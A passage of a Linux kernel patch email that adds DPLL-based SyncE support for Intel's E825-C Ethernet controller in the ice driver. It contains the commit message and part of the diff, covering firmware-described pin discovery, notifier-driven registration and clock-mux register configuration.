drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
From: Arkadiusz Kubalewski <arkadiusz.kubalewski@intel.com> Implement SyncE support for the E825-C Ethernet controller using the DPLL subsystem. Unlike E810, the E825-C architecture relies on platform firmware (ACPI) to describe connections between the NIC's recovered clock outputs and external DPLL inputs. Implement the following mechanisms to support this architecture: 1. Discovery Mechanism: The driver parses the 'dpll-pins' and 'dpll-pin names' firmware properties to identify the external DPLL pins (parents) corresponding to its RCLK outputs ("rclk0", "rclk1"). It uses fwnode_dpll_pin_find() to locate these parent pins in the DPLL core. 2. Asynchronous Registration: Since the platform DPLL driver (e.g. zl3073x) may probe independently of the network driver, utilize the DPLL notifier chain The driver listens for DPLL_PIN_CREATED events to detect when the parent MUX pins become available, then registers its own Recovered Clock (RCLK) pins as children of those parents. 3. Hardware Configuration: Implement the specific register access logic for E825-C CGU (Clock Generation Unit) registers (R10, R11). This includes configuring the bypass MUXes and clock dividers required to drive SyncE signals. 4. Split Initialization: Refactor `ice_dpll_init()` to separate the static initialization path of E810 from the dynamic, firmware-driven path required for E825-C. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Co-developed-by: Ivan Vecera <ivecera@redhat.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> Co-developed-by: Grzegorz Nitka <grzegorz.nitka@intel.com> Signed-off-by: Grzegorz Nitka <grzegorz.nitka@intel.com> Signed-off-by: Arkadiusz Kubalewski <arkadiusz.kubalewski@intel.com> --- v3: * DPLL init check in ice_ptp_link_change() * using completion for dpll initization to avoid races with DPLL notifier scheduled works * added parsing of dpll-pin-names and dpll-pins properties v2: * fixed error path in ice_dpll_init_pins_e825() * fixed misleading comment referring 'device tree' --- drivers/net/ethernet/intel/ice/ice_dpll.c | 742 +++++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 26 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 ++++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + 8 files changed, 956 insertions(+), 92 deletions(-) diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 4eca62688d834..a8c99e49bfae6 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c @@ -5,6 +5,7 @@ #include "ice_lib.h" #include "ice_trace.h" #include <linux/dpll.h> +#include <linux/property.h> #define ICE_CGU_STATE_ACQ_ERR_THRESHOLD 50 #define ICE_DPLL_PIN_IDX_INVALID 0xff @@ -528,6 +529,92 @@ ice_dpll_pin_disable(struct ice_hw *hw, struct ice_dpll_pin *pin, return ret; } +/** + * ice_dpll_pin_store_state - updates the state of pin in SW bookkeeping + * @pin: pointer to a pin + * @parent: parent pin index + * @state: pin state (connected or disconnected) + */ +static void +ice_dpll_pin_store_state(struct ice_dpll_pin *pin, int parent, bool state) +{ + pin->state[parent] = state ? DPLL_PIN_STATE_CONNECTED : + DPLL_PIN_STATE_DISCONNECTED; +} + +/** + * ice_dpll_rclk_update_e825c - updates the state of rclk pin on e825c device + * @pf: private board struct + * @pin: pointer to a pin + * + * Update struct holding pin states info, states are separate for each parent + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - OK + * * negative - error + */ +static int ice_dpll_rclk_update_e825c(struct ice_pf *pf, + struct ice_dpll_pin *pin) +{ + u8 rclk_bits; + int err; + u32 reg; + + if (pf->dplls.rclk.num_parents > ICE_SYNCE_CLK_NUM) + return -EINVAL; + + err = ice_read_cgu_reg(&pf->hw, ICE_CGU_R10, &reg); + if (err) + return err; + + rclk_bits = FIELD_GET(ICE_CGU_R10_SYNCE_S_REF_CLK, reg); + ice_dpll_pin_store_state(pin, ICE_SYNCE_CLK0, rclk_bits == + (pf->ptp.port.port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C)); + + err = ice_read_cgu_reg(&pf->hw, ICE_CGU_R11, &reg); + if (err) + return err; + + rclk_bits = FIELD_GET(ICE_CGU_R11_SYNCE_S_BYP_CLK, reg); + ice_dpll_pin_store_state(pin, ICE_SYNCE_CLK1, rclk_bits == + (pf->ptp.port.port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C)); + + return 0; +} + +/** + * ice_dpll_rclk_update - updates the state of rclk pin on a device + * @pf: private board struct + * @pin: pointer to a pin + * @port_num: port number + * + * Update struct holding pin states info, states are separate for each parent + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - OK + * * negative - error + */ +static int ice_dpll_rclk_update(struct ice_pf *pf, struct ice_dpll_pin *pin, + u8 port_num) +{ + int ret; + + for (u8 parent = 0; parent < pf->dplls.rclk.num_parents; parent++) { + ret = ice_aq_get_phy_rec_clk_out(&pf->hw, &parent, &port_num, + &pin->flags[parent], NULL); + if (ret) + return ret; + + ice_dpll_pin_store_state(pin, parent, + ICE_AQC_GET_PHY_REC_CLK_OUT_OUT_EN & + pin->flags[parent]); + } + + return 0; +} + /** * ice_dpll_sw_pins_update - update status of all SW pins * @pf: private board struct @@ -668,22 +755,14 @@ ice_dpll_pin_state_update(struct ice_pf *pf, struct ice_dpll_pin *pin, } break; case ICE_DPLL_PIN_TYPE_RCLK_INPUT: - for (parent = 0; parent < pf->dplls.rclk.num_parents; - parent++) { - u8 p = parent; - - ret = ice_aq_get_phy_rec_clk_out(&pf->hw, &p, - &port_num, - &pin->flags[parent], - NULL); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) { + ret = ice_dpll_rclk_update_e825c(pf, pin); + if (ret) + goto err; + } else { + ret = ice_dpll_rclk_update(pf, pin, port_num); if (ret) goto err; - if (ICE_AQC_GET_PHY_REC_CLK_OUT_OUT_EN & - pin->flags[parent]) - pin->state[parent] = DPLL_PIN_STATE_CONNECTED; - else - pin->state[parent] = - DPLL_PIN_STATE_DISCONNECTED; } break; case ICE_DPLL_PIN_TYPE_SOFTWARE: @@ -1842,6 +1921,40 @@ ice_dpll_phase_offset_get(const struct dpll_pin *pin, void *pin_priv, return 0; } +/** + * ice_dpll_synce_update_e825c - setting PHY recovered clock pins on e825c + * @hw: Pointer to the HW struct + * @ena: true if enable, false in disable + * @port_num: port number + * @output: output pin, we have two in E825C + * + * DPLL subsystem callback. Set proper signals to recover clock from port. + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +static int ice_dpll_synce_update_e825c(struct ice_hw *hw, bool ena, + u32 port_num, enum ice_synce_clk output) +{ + int err; + + /* configure the mux to deliver proper signal to DPLL from the MUX */ + err = ice_tspll_cfg_bypass_mux_e825c(hw, ena, port_num, output); + if (err) + return err; + + err = ice_tspll_cfg_synce_ethdiv_e825c(hw, output); + if (err) + return err; + + dev_dbg(ice_hw_to_dev(hw), "CLK_SYNCE%u recovered clock: pin %s\n", + output, str_enabled_disabled(ena)); + + return 0; +} + /** * ice_dpll_output_esync_set - callback for setting embedded sync * @pin: pointer to a pin @@ -2263,6 +2376,28 @@ ice_dpll_sw_input_ref_sync_get(const struct dpll_pin *pin, void *pin_priv, state, extack); } +static int +ice_dpll_pin_get_parent_num(struct ice_dpll_pin *pin, + const struct dpll_pin *parent) +{ + int i; + + for (i = 0; i < pin->num_parents; i++) + if (pin->pf->dplls.inputs[pin->parent_idx[i]].pin == parent) + return i; + + return -ENOENT; +} + +static int +ice_dpll_pin_get_parent_idx(struct ice_dpll_pin *pin, + const struct dpll_pin *parent) +{ + int num = ice_dpll_pin_get_parent_num(pin, parent); + + return num < 0 ? num : pin->parent_idx[num]; +} + /** * ice_dpll_rclk_state_on_pin_set - set a state on rclk pin * @pin: pointer to a pin @@ -2286,35 +2421,44 @@ ice_dpll_rclk_state_on_pin_set(const struct dpll_pin *pin, void *pin_priv, enum dpll_pin_state state, struct netlink_ext_ack *extack) { - struct ice_dpll_pin *p = pin_priv, *parent = parent_pin_priv; bool enable = state == DPLL_PIN_STATE_CONNECTED; + struct ice_dpll_pin *p = pin_priv; struct ice_pf *pf = p->pf; + struct ice_hw *hw; int ret = -EINVAL; - u32 hw_idx; + int hw_idx; + + hw = &pf->hw; if (ice_dpll_is_reset(pf, extack)) return -EBUSY; mutex_lock(&pf->dplls.lock); - hw_idx = parent->idx - pf->dplls.base_rclk_idx; - if (hw_idx >= pf->dplls.num_inputs) + hw_idx = ice_dpll_pin_get_parent_idx(p, parent_pin); + if (hw_idx < 0) goto unlock; if ((enable && p->state[hw_idx] == DPLL_PIN_STATE_CONNECTED) || (!enable && p->state[hw_idx] == DPLL_PIN_STATE_DISCONNECTED)) { NL_SET_ERR_MSG_FMT(extack, "pin:%u state:%u on parent:%u already set", - p->idx, state, parent->idx); + p->idx, state, + ice_dpll_pin_get_parent_num(p, parent_pin)); goto unlock; } - ret = ice_aq_set_phy_rec_clk_out(&pf->hw, hw_idx, enable, - &p->freq); + + ret = hw->mac_type == ICE_MAC_GENERIC_3K_E825 ? + ice_dpll_synce_update_e825c(hw, enable, + pf->ptp.port.port_num, + (enum ice_synce_clk)hw_idx) : + ice_aq_set_phy_rec_clk_out(hw, hw_idx, enable, &p->freq); if (ret) NL_SET_ERR_MSG_FMT(extack, "err:%d %s failed to set pin state:%u for pin:%u on parent:%u", ret, - libie_aq_str(pf->hw.adminq.sq_last_status), - state, p->idx, parent->idx); + libie_aq_str(hw->adminq.sq_last_status), + state, p->idx, + ice_dpll_pin_get_parent_num(p, parent_pin)); unlock: mutex_unlock(&pf->dplls.lock); @@ -2344,17 +2488,17 @@ ice_dpll_rclk_state_on_pin_get(const struct dpll_pin *pin, void *pin_priv, enum dpll_pin_state *state, struct netlink_ext_ack *extack) { - struct ice_dpll_pin *p = pin_priv, *parent = parent_pin_priv; + struct ice_dpll_pin *p = pin_priv; struct ice_pf *pf = p->pf; int ret = -EINVAL; - u32 hw_idx; + int hw_idx; if (ice_dpll_is_reset(pf, extack)) return -EBUSY; mutex_lock(&pf->dplls.lock); - hw_idx = parent->idx - pf->dplls.base_rclk_idx; - if (hw_idx >= pf->dplls.num_inputs) + hw_idx = ice_dpll_pin_get_parent_idx(p, parent_pin); + if (hw_idx < 0) goto unlock; ret = ice_dpll_pin_state_update(pf, p, ICE_DPLL_PIN_TYPE_RCLK_INPUT, @@ -2814,7 +2958,8 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin, &pins[i].tracker); + if (!IS_ERR_OR_NULL(pins[i].pin)) + dpll_pin_put(pins[i].pin, &pins[i].tracker); } /** @@ -2836,10 +2981,14 @@ static int ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, int start_idx, int count, u64 clock_id) { + u32 pin_index; int i, ret; for (i = 0; i < count; i++) { - pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, + pin_index = start_idx; + if (start_idx != DPLL_PIN_IDX_UNSPEC) + pin_index += i; + pins[i].pin = dpll_pin_get(clock_id, pin_index, THIS_MODULE, &pins[i].prop, &pins[i].tracker); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); @@ -2944,6 +3093,7 @@ ice_dpll_register_pins(struct dpll_device *dpll, struct ice_dpll_pin *pins, /** * ice_dpll_deinit_direct_pins - deinitialize direct pins + * @pf: board private structure * @cgu: if cgu is present and controlled by this NIC * @pins: pointer to pins array * @count: number of pins @@ -2955,7 +3105,8 @@ ice_dpll_register_pins(struct dpll_device *dpll, struct ice_dpll_pin *pins, * Release pins resources to the dpll subsystem. */ static void -ice_dpll_deinit_direct_pins(bool cgu, struct ice_dpll_pin *pins, int count, +ice_dpll_deinit_direct_pins(struct ice_pf *pf, bool cgu, + struct ice_dpll_pin *pins, int count, const struct dpll_pin_ops *ops, struct dpll_device *first, struct dpll_device *second) @@ -3024,14 +3175,14 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) { struct ice_dpll_pin *rclk = &pf->dplls.rclk; struct ice_vsi *vsi = ice_get_main_vsi(pf); - struct dpll_pin *parent; + struct ice_dpll_pin *parent; int i; for (i = 0; i < rclk->num_parents; i++) { - parent = pf->dplls.inputs[rclk->parent_idx[i]].pin; - if (!parent) + parent = &pf->dplls.inputs[rclk->parent_idx[i]]; + if (IS_ERR_OR_NULL(parent->pin)) continue; - dpll_pin_on_pin_unregister(parent, rclk->pin, + dpll_pin_on_pin_unregister(parent->pin, rclk->pin, &ice_dpll_rclk_ops, rclk); } if (WARN_ON_ONCE(!vsi || !vsi->netdev)) @@ -3040,60 +3191,213 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) dpll_pin_put(rclk->pin, &rclk->tracker); } +static bool ice_dpll_is_fwnode_pin(struct ice_dpll_pin *pin) +{ + return !IS_ERR_OR_NULL(pin->fwnode); +} + +static void ice_dpll_pin_notify_work(struct work_struct *work) +{ + struct ice_dpll_pin_work *w = container_of(work, + struct ice_dpll_pin_work, + work); + struct ice_dpll_pin *pin, *parent = w->pin; + struct ice_pf *pf = parent->pf; + int ret; + + wait_for_completion(&pf->dplls.dpll_init); + if (!test_bit(ICE_FLAG_DPLL, pf->flags)) + return; /* DPLL initialization failed */ + + switch (w->action) { + case DPLL_PIN_CREATED: + if (!IS_ERR_OR_NULL(parent->pin)) { + /* We have already our pin registered */ + goto out; + } + + /* Grab reference on fwnode pin */ + parent->pin = fwnode_dpll_pin_find(parent->fwnode, + &parent->tracker); + if (IS_ERR_OR_NULL(parent->pin)) { + dev_err(ice_pf_to_dev(pf), + "Cannot get fwnode pin reference\n"); + goto out; + } + + /* Register rclk pin */ + pin = &pf->dplls.rclk; + ret = dpll_pin_on_pin_register(parent->pin, pin->pin, + &ice_dpll_rclk_ops, pin); + if (ret) { + dev_err(ice_pf_to_dev(pf), + "Failed to register pin: %pe\n", ERR_PTR(ret)); + dpll_pin_put(parent->pin, &parent->tracker); + parent->pin = NULL; + goto out; + } + break; + case DPLL_PIN_DELETED: + if (IS_ERR_OR_NULL(parent->pin)) { + /* We have already our pin unregistered */ + goto out; + } + + /* Unregister rclk pin */ + pin = &pf->dplls.rclk; + dpll_pin_on_pin_unregister(parent->pin, pin->pin, + &ice_dpll_rclk_ops, pin); + + /* Drop fwnode pin reference */ + dpll_pin_put(parent->pin, &parent->tracker); + parent->pin = NULL; + break; + default: + break; + } +out: + kfree(w); +} + +static int ice_dpll_pin_notify(struct notifier_block *nb, unsigned long action, + void *data) +{ + struct ice_dpll_pin *pin = container_of(nb, struct ice_dpll_pin, nb); + struct dpll_pin_notifier_info *info = data; + struct ice_dpll_pin_work *work; + + if (action != DPLL_PIN_CREATED && action != DPLL_PIN_DELETED) + return NOTIFY_DONE; + + /* Check if the reported pin is this one */ + if (pin->fwnode != info->fwnode) + return NOTIFY_DONE; /* Not this pin */ + + work = kzalloc(sizeof(*work), GFP_KERNEL); + if (!work) + return NOTIFY_DONE; + + INIT_WORK(&work->work, ice_dpll_pin_notify_work); + work->action = action; + work->pin = pin; + + queue_work(pin->pf->dplls.wq, &work->work); + + return NOTIFY_OK; +} + /** - * ice_dpll_init_rclk_pins - initialize recovered clock pin + * ice_dpll_init_pin_common - initialize pin * @pf: board private structure * @pin: pin to register * @start_idx: on which index shall allocation start in dpll subsystem * @ops: callback ops registered with the pins * - * Allocate resource for recovered clock pin in dpll subsystem. Register the - * pin with the parents it has in the info. Register pin with the pf's main vsi - * netdev. + * Allocate resource for given pin in dpll subsystem. Register the pin with + * the parents it has in the info. * * Return: * * 0 - success * * negative - registration failure reason */ static int -ice_dpll_init_rclk_pins(struct ice_pf *pf, struct ice_dpll_pin *pin, - int start_idx, const struct dpll_pin_ops *ops) +ice_dpll_init_pin_common(struct ice_pf *pf, struct ice_dpll_pin *pin, + int start_idx, const struct dpll_pin_ops *ops) { - struct ice_vsi *vsi = ice_get_main_vsi(pf); - struct dpll_pin *parent; + struct ice_dpll_pin *parent; int ret, i; - if (WARN_ON((!vsi || !vsi->netdev))) - return -EINVAL; - ret = ice_dpll_get_pins(pf, pin, start_idx, ICE_DPLL_RCLK_NUM_PER_PF, - pf->dplls.clock_id); + ret = ice_dpll_get_pins(pf, pin, start_idx, 1, pf->dplls.clock_id); if (ret) return ret; - for (i = 0; i < pf->dplls.rclk.num_parents; i++) { - parent = pf->dplls.inputs[pf->dplls.rclk.parent_idx[i]].pin; - if (!parent) { - ret = -ENODEV; - goto unregister_pins; + + for (i = 0; i < pin->num_parents; i++) { + parent = &pf->dplls.inputs[pin->parent_idx[i]]; + if (IS_ERR_OR_NULL(parent->pin)) { + if (!ice_dpll_is_fwnode_pin(parent)) { + ret = -ENODEV; + goto unregister_pins; + } + parent->pin = fwnode_dpll_pin_find(parent->fwnode, + &parent->tracker); + if (IS_ERR_OR_NULL(parent->pin)) { + dev_info(ice_pf_to_dev(pf), + "Mux pin not registered yet\n"); + continue; + } } - ret = dpll_pin_on_pin_register(parent, pf->dplls.rclk.pin, - ops, &pf->dplls.rclk); + ret = dpll_pin_on_pin_register(parent->pin, pin->pin, ops, pin); if (ret) goto unregister_pins; } - dpll_netdev_pin_set(vsi->netdev, pf->dplls.rclk.pin); return 0; unregister_pins: while (i) { - parent = pf->dplls.inputs[pf->dplls.rclk.parent_idx[--i]].pin; - dpll_pin_on_pin_unregister(parent, pf->dplls.rclk.pin, - &ice_dpll_rclk_ops, &pf->dplls.rclk); + parent = &pf->dplls.inputs[pin->parent_idx[--i]]; + if (IS_ERR_OR_NULL(parent->pin)) + continue; + dpll_pin_on_pin_unregister(parent->pin, pin->pin, ops, pin); } - ice_dpll_release_pins(pin, ICE_DPLL_RCLK_NUM_PER_PF); + ice_dpll_release_pins(pin, 1); + return ret; } +/** + * ice_dpll_init_rclk_pin - initialize recovered clock pin + * @pf: board private structure + * @start_idx: on which index shall allocation start in dpll subsystem + * @ops: callback ops registered with the pins + * + * Allocate resource for recovered clock pin in dpll subsystem. Register the + * pin with the parents it has in the info. + * + * Return: + * * 0 - success + * * negative - registration failure reason + */ +static int +ice_dpll_init_rclk_pin(struct ice_pf *pf, int start_idx, + const struct dpll_pin_ops *ops) +{ + struct ice_vsi *vsi = ice_get_main_vsi(pf); + int ret; + + ret = ice_dpll_init_pin_common(pf, &pf->dplls.rclk, start_idx, ops); + if (ret) + return ret; + + dpll_netdev_pin_set(vsi->netdev, pf->dplls.rclk.pin); + + return 0; +} + +static void +ice_dpll_deinit_fwnode_pin(struct ice_dpll_pin *pin) +{ + unregister_dpll_notifier(&pin->nb); + flush_workqueue(pin->pf->dplls.wq); + if (!IS_ERR_OR_NULL(pin->pin)) { + dpll_pin_put(pin->pin, &pin->tracker); + pin->pin = NULL; + } + fwnode_handle_put(pin->fwnode); + pin->fwnode = NULL; +} + +static void +ice_dpll_deinit_fwnode_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, + int start_idx) +{ + int i; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) + ice_dpll_deinit_fwnode_pin(&pins[start_idx + i]); + destroy_workqueue(pf->dplls.wq); +} + /** * ice_dpll_deinit_pins - deinitialize direct pins * @pf: board private structure @@ -3113,6 +3417,8 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) struct ice_dpll *dp = &d->pps; ice_dpll_deinit_rclk_pin(pf); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + ice_dpll_deinit_fwnode_pins(pf, pf->dplls.inputs, 0); if (cgu) { ice_dpll_unregister_pins(dp->dpll, inputs, &ice_dpll_input_ops, num_inputs); @@ -3127,12 +3433,12 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) &ice_dpll_output_ops, num_outputs); ice_dpll_release_pins(outputs, num_outputs); if (!pf->dplls.generic) { - ice_dpll_deinit_direct_pins(cgu, pf->dplls.ufl, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.ufl, ICE_DPLL_PIN_SW_NUM, &ice_dpll_pin_ufl_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); - ice_dpll_deinit_direct_pins(cgu, pf->dplls.sma, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.sma, ICE_DPLL_PIN_SW_NUM, &ice_dpll_pin_sma_ops, pf->dplls.pps.dpll, @@ -3141,6 +3447,141 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) } } +static struct fwnode_handle * +ice_dpll_pin_node_get(struct ice_pf *pf, const char *name) +{ + struct fwnode_handle *fwnode = dev_fwnode(ice_pf_to_dev(pf)); + int index; + + index = fwnode_property_match_string(fwnode, "dpll-pin-names", name); + if (index < 0) + return ERR_PTR(-ENOENT); + + return fwnode_find_reference(fwnode, "dpll-pins", index); +} + +static int +ice_dpll_init_fwnode_pin(struct ice_dpll_pin *pin, const char *name) +{ + struct ice_pf *pf = pin->pf; + int ret; + + pin->fwnode = ice_dpll_pin_node_get(pf, name); + if (IS_ERR(pin->fwnode)) { + dev_err(ice_pf_to_dev(pf), + "Failed to find %s firmware node: %pe\n", name, + pin->fwnode); + pin->fwnode = NULL; + return -ENODEV; + } + + dev_dbg(ice_pf_to_dev(pf), "Found fwnode node for %s\n", name); + + pin->pin = fwnode_dpll_pin_find(pin->fwnode, &pin->tracker); + if (IS_ERR_OR_NULL(pin->pin)) { + dev_info(ice_pf_to_dev(pf), + "DPLL pin for %pfwp not registered yet\n", + pin->fwnode); + pin->pin = NULL; + } + + pin->nb.notifier_call = ice_dpll_pin_notify; + ret = register_dpll_notifier(&pin->nb); + if (ret) { + dev_err(ice_pf_to_dev(pf), + "Failed to subscribe for DPLL notifications\n"); + + if (!IS_ERR_OR_NULL(pin->pin)) { + dpll_pin_put(pin->pin, &pin->tracker); + pin->pin = NULL; + } + fwnode_handle_put(pin->fwnode); + pin->fwnode = NULL; + + return ret; + } + + return ret; +} + +/** + * ice_dpll_init_fwnode_pins - initialize pins from device tree + * @pf: board private structure + * @pins: pointer to pins array + * @start_idx: starting index for pins + * @count: number of pins to initialize + * + * Initialize input pins for E825 RCLK support. The parent pins (rclk0, rclk1) + * are expected to be defined by the system firmware (ACPI). This function + * allocates them in the dpll subsystem and stores their indices for later + * registration with the rclk pin. + * + * Return: + * * 0 - success + * * negative - initialization failure reason + */ +static int +ice_dpll_init_fwnode_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, + int start_idx) +{ + char pin_name[8]; + int i, ret; + + pf->dplls.wq = create_singlethread_workqueue("ice_dpll_wq"); + if (!pf->dplls.wq) + return -ENOMEM; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) { + pins[start_idx + i].pf = pf; + snprintf(pin_name, sizeof(pin_name), "rclk%u", i); + ret = ice_dpll_init_fwnode_pin(&pins[start_idx + i], pin_name); + if (ret) + goto error; + } + + return 0; +error: + while (i--) + ice_dpll_deinit_fwnode_pin(&pins[start_idx + i]); + + destroy_workqueue(pf->dplls.wq); + + return ret; +} + +/** + * ice_dpll_init_pins_e825 - init pins and register pins with a dplls + * @pf: board private structure + * @cgu: if cgu is present and controlled by this NIC + * + * Initialize directly connected pf's pins within pf's dplls in a Linux dpll + * subsystem. + * + * Return: + * * 0 - success + * * negative - initialization failure reason + */ +static int ice_dpll_init_pins_e825(struct ice_pf *pf) +{ + int ret; + + ret = ice_dpll_init_fwnode_pins(pf, pf->dplls.inputs, 0); + if (ret) + return ret; + + ret = ice_dpll_init_rclk_pin(pf, DPLL_PIN_IDX_UNSPEC, + &ice_dpll_rclk_ops); + if (ret) { + /* Inform DPLL notifier works that DPLL init was finished + * unsuccessfully (ICE_DPLL_FLAG not set). + */ + complete_all(&pf->dplls.dpll_init); + ice_dpll_deinit_fwnode_pins(pf, pf->dplls.inputs, 0); + } + + return ret; +} + /** * ice_dpll_init_pins - init pins and register pins with a dplls * @pf: board private structure @@ -3155,21 +3596,24 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) */ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) { + const struct dpll_pin_ops *output_ops; + const struct dpll_pin_ops *input_ops; int ret, count; + input_ops = &ice_dpll_input_ops; + output_ops = &ice_dpll_output_ops; + ret = ice_dpll_init_direct_pins(pf, cgu, pf->dplls.inputs, 0, - pf->dplls.num_inputs, - &ice_dpll_input_ops, - pf->dplls.eec.dpll, pf->dplls.pps.dpll); + pf->dplls.num_inputs, input_ops, + pf->dplls.eec.dpll, + pf->dplls.pps.dpll); if (ret) return ret; count = pf->dplls.num_inputs; if (cgu) { ret = ice_dpll_init_direct_pins(pf, cgu, pf->dplls.outputs, - count, - pf->dplls.num_outputs, - &ice_dpll_output_ops, - pf->dplls.eec.dpll, + count, pf->dplls.num_outputs, + output_ops, pf->dplls.eec.dpll, pf->dplls.pps.dpll); if (ret) goto deinit_inputs; @@ -3205,30 +3649,30 @@ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) } else { count += pf->dplls.num_outputs + 2 * ICE_DPLL_PIN_SW_NUM; } - ret = ice_dpll_init_rclk_pins(pf, &pf->dplls.rclk, count + pf->hw.pf_id, - &ice_dpll_rclk_ops); + + ret = ice_dpll_init_rclk_pin(pf, count + pf->ptp.port.port_num, + &ice_dpll_rclk_ops); if (ret) goto deinit_ufl; return 0; deinit_ufl: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.ufl, - ICE_DPLL_PIN_SW_NUM, - &ice_dpll_pin_ufl_ops, - pf->dplls.pps.dpll, pf->dplls.eec.dpll); + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.ufl, ICE_DPLL_PIN_SW_NUM, + &ice_dpll_pin_ufl_ops, pf->dplls.pps.dpll, + pf->dplls.eec.dpll); deinit_sma: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.sma, - ICE_DPLL_PIN_SW_NUM, - &ice_dpll_pin_sma_ops, - pf->dplls.pps.dpll, pf->dplls.eec.dpll); + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.sma, ICE_DPLL_PIN_SW_NUM, + &ice_dpll_pin_sma_ops, pf->dplls.pps.dpll, + pf->dplls.eec.dpll); deinit_outputs: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.outputs, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.outputs, pf->dplls.num_outputs, - &ice_dpll_output_ops, pf->dplls.pps.dpll, + output_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); deinit_inputs: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.inputs, pf->dplls.num_inputs, - &ice_dpll_input_ops, pf->dplls.pps.dpll, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.inputs, + pf->dplls.num_inputs, + input_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); return ret; } @@ -3239,8 +3683,8 @@ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) * @d: pointer to ice_dpll * @cgu: if cgu is present and controlled by this NIC * - * If cgu is owned unregister the dpll from dpll subsystem. - * Release resources of dpll device from dpll subsystem. + * If cgu is owned, unregister the DPL from DPLL subsystem. + * Release resources of DPLL device from DPLL subsystem. */ static void ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) @@ -3257,8 +3701,8 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) * @cgu: if cgu is present and controlled by this NIC * @type: type of dpll being initialized * - * Allocate dpll instance for this board in dpll subsystem, if cgu is controlled - * by this NIC, register dpll with the callback ops. + * Allocate DPLL instance for this board in dpll subsystem, if cgu is controlled + * by this NIC, register DPLL with the callback ops. * * Return: * * 0 - success @@ -3289,6 +3733,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ret = dpll_device_register(d->dpll, type, ops, d); if (ret) { dpll_device_put(d->dpll, &d->tracker); + d->dpll = NULL; return ret; } d->ops = ops; @@ -3506,6 +3951,26 @@ ice_dpll_init_info_direct_pins(struct ice_pf *pf, return ret; } +/** + * ice_dpll_init_info_pin_on_pin_e825c - initializes rclk pin information + * @pf: board private structure + * + * Init information for rclk pin, cache them in pf->dplls.rclk. + * + * Return: + * * 0 - success + */ +static int ice_dpll_init_info_pin_on_pin_e825c(struct ice_pf *pf) +{ + struct ice_dpll_pin *rclk_pin = &pf->dplls.rclk; + + rclk_pin->prop.type = DPLL_PIN_TYPE_SYNCE_ETH_PORT; + rclk_pin->prop.capabilities |= DPLL_PIN_CAPABILITIES_STATE_CAN_CHANGE; + rclk_pin->pf = pf; + + return 0; +} + /** * ice_dpll_init_info_rclk_pin - initializes rclk pin information * @pf: board private structure @@ -3632,7 +4097,10 @@ ice_dpll_init_pins_info(struct ice_pf *pf, enum ice_dpll_pin_type pin_type) case ICE_DPLL_PIN_TYPE_OUTPUT: return ice_dpll_init_info_direct_pins(pf, pin_type); case ICE_DPLL_PIN_TYPE_RCLK_INPUT: - return ice_dpll_init_info_rclk_pin(pf); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + return ice_dpll_init_info_pin_on_pin_e825c(pf); + else + return ice_dpll_init_info_rclk_pin(pf); case ICE_DPLL_PIN_TYPE_SOFTWARE: return 